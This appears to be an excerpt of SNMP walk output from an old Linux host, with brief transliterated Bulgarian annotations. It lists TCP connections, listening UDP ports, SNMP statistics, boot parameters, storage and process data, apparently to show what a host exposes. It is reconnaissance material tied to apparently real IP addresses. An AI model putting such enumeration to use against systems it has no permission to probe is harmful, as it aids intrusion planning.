tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.3128.192.168.0.25.1436 = INTEGER: 3128
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.3128.192.168.0.25.1437 = INTEGER: 3128
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.3128.12.32.42.194.1487 = INTEGER: 3128
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.3128.12.32.42.210.1517 = INTEGER: 3128
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.3128.12.32.42.210.1524 = INTEGER: 3128
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.3333.12.32.42.199.1038 = INTEGER: 3333
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.4205.34.42.134.6.8080 = INTEGER: 4205
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.4446.34.42.134.6.8080 = INTEGER: 4446
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.14.11.15.193.53.0.0.0.0.0 = INTEGER: 53
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.7.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.9.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.13.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.19.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.21.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.22.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.23.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.25.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.37.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.79.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.80.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.110.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.111.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.113.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.515.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.3046.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.3128.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.3333.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.4444.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.53.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3644.127.0.0.1.3645 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3645.127.0.0.1.3644 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3646.127.0.0.1.3647 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3647.127.0.0.1.3646 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3648.127.0.0.1.3649 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3649.127.0.0.1.3648 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3650.127.0.0.1.3651 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3651.127.0.0.1.3650 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3652.127.0.0.1.3653 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3653.127.0.0.1.3652 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3654.127.0.0.1.3655 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3655.127.0.0.1.3654 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3656.127.0.0.1.3657 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3657.127.0.0.1.3656 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.22.12.32.42.194.1023 = IpAddress: 12.32.42.194
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.53.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.2747.34.42.134.6.6667 = IpAddress: 34.42.134.6
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.3128.192.168.0.25.1433 = IpAddress: 192.168.0.25
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.3128.192.168.0.25.1435 = IpAddress: 192.168.0.25
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.3128.192.168.0.25.1436 = IpAddress: 192.168.0.25
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.3128.192.168.0.25.1437 = IpAddress: 192.168.0.25
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.3128.12.32.42.194.1487 = IpAddress: 12.32.42.194
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.3128.12.32.42.210.1517 = IpAddress: 12.32.42.210
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.3128.12.32.42.210.1524 = IpAddress: 12.32.42.210
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.3333.12.32.42.199.1038 = IpAddress: 12.32.42.199
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.4205.34.42.134.6.8080 = IpAddress: 34.42.134.6
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.4446.34.42.134.6.8080 = IpAddress: 34.42.134.6
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.14.11.15.193.53.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.7.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.9.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.13.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.19.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.21.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.22.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.23.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.25.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.37.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.79.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.80.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.110.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.111.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.113.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.515.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.3046.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.3128.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.3333.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.4444.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.53.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3644.127.0.0.1.3645 = INTEGER: 3645
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3645.127.0.0.1.3644 = INTEGER: 3644
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3646.127.0.0.1.3647 = INTEGER: 3647
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3647.127.0.0.1.3646 = INTEGER: 3646
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3648.127.0.0.1.3649 = INTEGER: 3649
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3649.127.0.0.1.3648 = INTEGER: 3648
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3650.127.0.0.1.3651 = INTEGER: 3651
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3651.127.0.0.1.3650 = INTEGER: 3650
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3652.127.0.0.1.3653 = INTEGER: 3653
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3653.127.0.0.1.3652 = INTEGER: 3652
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3654.127.0.0.1.3655 = INTEGER: 3655
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3655.127.0.0.1.3654 = INTEGER: 3654
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3656.127.0.0.1.3657 = INTEGER: 3657
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3657.127.0.0.1.3656 = INTEGER: 3656
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.22.12.32.42.194.1023 = INTEGER: 1023
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.53.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.2747.34.42.134.6.6667 = INTEGER: 6667
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.3128.192.168.0.25.1433 = INTEGER: 1433
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.3128.192.168.0.25.1435 = INTEGER: 1435
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.3128.192.168.0.25.1436 = INTEGER: 1436
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.3128.192.168.0.25.1437 = INTEGER: 1437
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.3128.12.32.42.194.1487 = INTEGER: 1487
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.3128.12.32.42.210.1517 = INTEGER: 1517
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.3128.12.32.42.210.1524 = INTEGER: 1524
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.3333.12.32.42.199.1038 = INTEGER: 1038
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.4205.34.42.134.6.8080 = INTEGER: 8080
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.4446.34.42.134.6.8080 = INTEGER: 8080
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.14.11.15.193.53.0.0.0.0.0 = INTEGER: 0
<[ Osushtestveni TCP vruzki........ ]>
tcp.tcpInErrs.0 = Counter: 610
tcp.tcpOutRsts.0 = Counter: 20085
udp.udpInDatagrams.0 = Counter: 2142957
udp.udpNoPorts.0 = Counter: 3135
udp.udpInErrors.0 = Counter: 0
udp.udpOutDatagrams.0 = Counter: 2174841
udp.udpTable.udpEntry.udpLocalAddress.0.0.0.0.37 = IpAddress: 0.0.0.0
udp.udpTable.udpEntry.udpLocalAddress.0.0.0.0.111 = IpAddress: 0.0.0.0
udp.udpTable.udpEntry.udpLocalAddress.0.0.0.0.161 = IpAddress: 0.0.0.0
udp.udpTable.udpEntry.udpLocalAddress.0.0.0.0.514 = IpAddress: 0.0.0.0
udp.udpTable.udpEntry.udpLocalAddress.0.0.0.0.517 = IpAddress: 0.0.0.0
udp.udpTable.udpEntry.udpLocalAddress.0.0.0.0.518 = IpAddress: 0.0.0.0
udp.udpTable.udpEntry.udpLocalAddress.0.0.0.0.800 = IpAddress: 0.0.0.0
udp.udpTable.udpEntry.udpLocalAddress.0.0.0.0.1854 = IpAddress: 0.0.0.0
udp.udpTable.udpEntry.udpLocalAddress.0.0.0.0.2173 = IpAddress: 0.0.0.0
udp.udpTable.udpEntry.udpLocalAddress.0.0.0.0.3130 = IpAddress: 0.0.0.0
udp.udpTable.udpEntry.udpLocalAddress.127.0.0.1.53 = IpAddress: 127.0.0.1
udp.udpTable.udpEntry.udpLocalAddress.12.32.42.193.53 = IpAddress: 12.32.42.193
udp.udpTable.udpEntry.udpLocalAddress.14.11.15.193.53 = IpAddress: 14.11.15.193
udp.udpTable.udpEntry.udpLocalPort.0.0.0.0.37 = INTEGER: 37
udp.udpTable.udpEntry.udpLocalPort.0.0.0.0.111 = INTEGER: 111
udp.udpTable.udpEntry.udpLocalPort.0.0.0.0.161 = INTEGER: 161
udp.udpTable.udpEntry.udpLocalPort.0.0.0.0.514 = INTEGER: 514
udp.udpTable.udpEntry.udpLocalPort.0.0.0.0.517 = INTEGER: 517
udp.udpTable.udpEntry.udpLocalPort.0.0.0.0.518 = INTEGER: 518
udp.udpTable.udpEntry.udpLocalPort.0.0.0.0.800 = INTEGER: 800
udp.udpTable.udpEntry.udpLocalPort.0.0.0.0.1854 = INTEGER: 1854
udp.udpTable.udpEntry.udpLocalPort.0.0.0.0.2173 = INTEGER: 2173
udp.udpTable.udpEntry.udpLocalPort.0.0.0.0.3130 = INTEGER: 3130
udp.udpTable.udpEntry.udpLocalPort.127.0.0.1.53 = INTEGER: 53
udp.udpTable.udpEntry.udpLocalPort.12.32.42.193.53 = INTEGER: 53
udp.udpTable.udpEntry.udpLocalPort.14.11.15.193.53 = INTEGER: 53
<[ UDP listening socket-i ]>
snmp.snmpInPkts.0 = Counter: 1048422
snmp.snmpOutPkts.0 = Counter: 1048421
snmp.snmpInBadVersions.0 = Counter: 0
snmp.snmpInBadCommunityNames.0 = Counter: 0
snmp.snmpInBadCommunityUses.0 = Counter: 0
snmp.snmpInASNParseErrs.0 = Counter: 0
snmp.snmpInTooBigs.0 = Counter: 0
snmp.snmpInNoSuchNames.0 = Counter: 0
snmp.snmpInBadValues.0 = Counter: 0
snmp.snmpInReadOnlys.0 = Counter: 0
snmp.snmpInGenErrs.0 = Counter: 0
snmp.snmpInTotalReqVars.0 = Counter: 1048433
snmp.snmpInTotalSetVars.0 = Counter: 0
snmp.snmpInGetRequests.0 = Counter: 8487
snmp.snmpInGetNexts.0 = Counter: 1039949
snmp.snmpInSetRequests.0 = Counter: 0
snmp.snmpInGetResponses.0 = Counter: 0
snmp.snmpInTraps.0 = Counter: 0
snmp.snmpOutTooBigs.0 = Counter: 0
snmp.snmpOutNoSuchNames.0 = Counter: 0
snmp.snmpOutBadValues.0 = Counter: 0
snmp.snmpOutGenErrs.0 = Counter: 0
snmp.snmpOutGetRequests.0 = Counter: 0
snmp.snmpOutGetNexts.0 = Counter: 0
snmp.snmpOutSetRequests.0 = Counter: 0
snmp.snmpOutGetResponses.0 = Counter: 0
snmp.snmpOutTraps.0 = Counter: 0
snmp.snmpEnableAuthenTraps.0 = INTEGER: disabled(2)
<[ statistika za samoto SNMP ]>
host.hrSystem.hrSystemUptime.0 = Timeticks: (42427609) 4 days, 21:51:16
host.hrSystem.hrSystemDate.0 = OCTET STRING: Hex: 00 63 07 10 0E 37 1B 00
host.hrSystem.hrSystemInitialLoadDevice.0 = INTEGER: 770
host.hrSystem.hrSystemInitialLoadParameters.0 = OCTET STRING: "auto BOOT_IMAGE=linux2210 ro root=302 BOOT_FILE=/linux2.2.10 digi=E,PC/Xe,D,8,110,D8000"
host.hrSystem.hrSystemNumUsers.0 = Gauge: 7
host.hrSystem.hrSystemProcesses.0 = Gauge: 74
host.hrSystem.hrSystemMaxProcesses.0 = INTEGER: 512
host.hrStorage.hrMemorySize.0 = INTEGER: 65536
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageIndex.1 = INTEGER: 1
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageIndex.2 = INTEGER: 2
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageIndex.770 = INTEGER: 770
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageType.1 = OBJECT IDENTIFIER: host.hrStorage.hrStorageTypes.hrStorageRam
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageType.2 = OBJECT IDENTIFIER: host.hrStorage.hrStorageTypes.hrStorageVirtualMemory
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageType.770 = OBJECT IDENTIFIER: host.hrStorage.hrStorageTypes.hrStorageFixedDisk
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageDescr.1 = OCTET STRING: "Mem" Hex: 4D 65 6D
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageDescr.2 = OCTET STRING: "Swap" Hex: 53 77 61 70
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageDescr.770 = OCTET STRING: "Disk" Hex: 44 69 73 6B
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageAllocationUnits.1 = INTEGER: 1024
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageAllocationUnits.2 = INTEGER: 1024
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageAllocationUnits.770 = INTEGER: 1024
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageSize.1 = INTEGER: 63128
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageSize.2 = INTEGER: 64224
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageSize.770 = INTEGER: 4005619
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageUsed.1 = INTEGER: 58796
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageUsed.2 = INTEGER: 19980
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageUsed.770 = INTEGER: 1349015
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageAllocationFailures.1 = Counter: 0
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageAllocationFailures.2 = Counter: 0
host.hrStorage.hrStorageTable.hrStorageEntry.hrStorageAllocationFailures.770 = Counter: 0
host.hrDevice.hrDeviceTable.hrDeviceEntry.hrDeviceIndex.1 = INTEGER: 1
host.hrDevice.hrDeviceTable.hrDeviceEntry.hrDeviceType.1 = OBJECT IDENTIFIER: host.hrDevice.hrDeviceTypes.hrDeviceProcessor
host.hrDevice.hrDeviceTable.hrDeviceEntry.hrDeviceDescr.1 = OCTET STRING: "vendor_id: GenuineIntel, cpu family: 5"
host.hrDevice.hrDeviceTable.hrDeviceEntry.hrDeviceID.1 = OBJECT IDENTIFIER: .ccitt.0
host.hrDevice.hrDeviceTable.hrDeviceEntry.hrDeviceStatus.1 = INTEGER: running(2)
host.hrDevice.hrDeviceTable.hrDeviceEntry.hrDeviceErrors.1 = Counter: 0
host.hrDevice.hrProcessorTable.hrProcessorEntry.hrProcessorFrwID.1 = OBJECT IDENTIFIER: .ccitt.0
host.hrDevice.hrProcessorTable.hrProcessorEntry.hrProcessorLoad.1 = INTEGER: 2
host.hrDevice.hrFSTable.hrFSEntry.hrFSIndex.770 = INTEGER: 770
host.hrDevice.hrFSTable.hrFSEntry.hrFSMountPoint.770 = OCTET STRING: "/dev/hda2"
host.hrDevice.hrFSTable.hrFSEntry.hrFSRemoteMountPoint.770 = OCTET STRING: "/" Hex: 2F
host.hrDevice.hrFSTable.hrFSEntry.hrFSType.770 = OBJECT IDENTIFIER: host.hrDevice.hrFSTypes.hrFSUnknown
host.hrDevice.hrFSTable.hrFSEntry.hrFSAccess.770 = INTEGER: readWrite(1)
host.hrDevice.hrFSTable.hrFSEntry.hrFSBootable.770 = INTEGER: true(1)
host.hrDevice.hrFSTable.hrFSEntry.hrFSStorageIndex.770 = INTEGER: 770
host.hrDevice.hrFSTable.hrFSEntry.hrFSLastFullBackupDate.770 = OCTET STRING: Hex: 00 00 01 01 00 00 00 00
host.hrDevice.hrFSTable.hrFSEntry.hrFSLastPartialBackupDate.770 = OCTET STRING: Hex: 00 00 01 01 00 00 00 00
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.0 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1 = INTEGER: 487
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.2 = INTEGER: 143
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.3 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.4 = INTEGER: 294
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13 = INTEGER: 253
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.185 = INTEGER: 2586
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.187 = INTEGER: 1
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.194 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.198 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.200 = INTEGER: 541
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.203 = INTEGER: 1444
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.209 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.216 = INTEGER: 329
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.220 = INTEGER: 32132
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.231 = INTEGER: 22
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.236 = INTEGER: 8
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.331 = INTEGER: 2708
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1801 = INTEGER: 1
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1802 = INTEGER: 6361
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1803 = INTEGER: 1
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1804 = INTEGER: 24
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1805 = INTEGER: 18
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1806 = INTEGER: 22
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1807 = INTEGER: 26
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1808 = INTEGER: 30
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1809 = INTEGER: 23
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1810 = INTEGER: 36
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1811 = INTEGER: 34
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1812 = INTEGER: 25
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1813 = INTEGER: 37
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1814 = INTEGER: 29
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1815 = INTEGER: 24
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1816 = INTEGER: 29
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1817 = INTEGER: 29
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1818 = INTEGER: 23
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.1819 = INTEGER: 28
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.2726 = INTEGER: 3
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.2727 = INTEGER: 2
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.2728 = INTEGER: 0
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.11969 = INTEGER: 5
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13050 = INTEGER: 1
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13051 = INTEGER: 4
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13052 = INTEGER: 4
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13506 = INTEGER: 16
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13521 = INTEGER: 3
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13872 = INTEGER: 9
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13873 = INTEGER: 2
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13874 = INTEGER: 2
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13875 = INTEGER: 2
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13876 = INTEGER: 2
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13877 = INTEGER: 2
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.13878 = INTEGER: 2
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.16256 = INTEGER: 3
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.16748 = INTEGER: 23
host.hrSWRunPerf.hrSWRunPerfTable.hrSWRunPerfEntry.hrSWRunPerfCPU.16750 = INTEGER: 13
